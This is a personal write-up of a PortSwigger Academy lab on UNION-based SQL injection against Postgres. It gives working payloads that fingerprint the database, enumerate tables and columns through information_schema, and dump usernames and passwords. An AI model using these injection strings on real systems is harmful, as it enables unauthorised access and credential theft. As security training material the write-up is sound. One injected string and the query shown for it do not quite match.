Write-up: SQL injection attack, listing the database contents on non-Oracle databases @ PortSwigger Academy
This write-up for the lab SQL injection attack, listing the database contents on non-Oracle databases is part of my walkthrough series for PortSwigger’s Web Security Academy.
Learning path: Server-side topics → SQL injection
Python script: script.py
Lab description
Query
The query used in the lab will look something like
SELECT * FROM someTable WHERE category = '<CATEGORY>'
Steps
The first steps are identical to the labs SQL injection UNION attack, determining the number of columns returned by the query and SQL injection UNION attack, finding a column containing text and are not repeated here.
As a result of these steps, I find out that the number of columns is 2, with both being string columns.
Find users table
The database in use here is Postgres (enumerated by injection ' UNION SELECT null,version()--
), which holds the table information in the information_schema.tables-table. In the relevant documentation, the available columns are listed. We are interested in table_name
. So inject ' UNION SELECT table_name, table_schema from information_schema.tables--
into the parameter to form the following query:
SELECT * FROM someTable WHERE category='X' UNION SELECT table_name, null from information_schema.tables--'`
I use an invalid category so that no articles are found and only my output appears.
Enumerate colums in this table
The information_schema.columns view holds information about the columns of each table, specifically the column_name
column. The proper string to inject is ' UNION SELECT column_name, null from information_schema.columns WHERE table_name = 'users_kcstmf'--
to form this query
SELECT * FROM someTable WHERE category='X' UNION SELECT column_name, null from information_schema.columns WHERE table_name = 'users_kcstmf'--'
Enumerate all usernames and passwords
Now we have all information to obtain the required usernames and passwords. Inject ' UNION SELECT username_spivdg, password_dfxmeh from users_kcstmf--
to form this query:
SELECT * FROM someTable WHERE category='X' UNION SELECT username_spivdg, password_dfxmeh from users_kcstmf--'`
Now I simply log in to solve this exercise.
Originally published at https://github.com.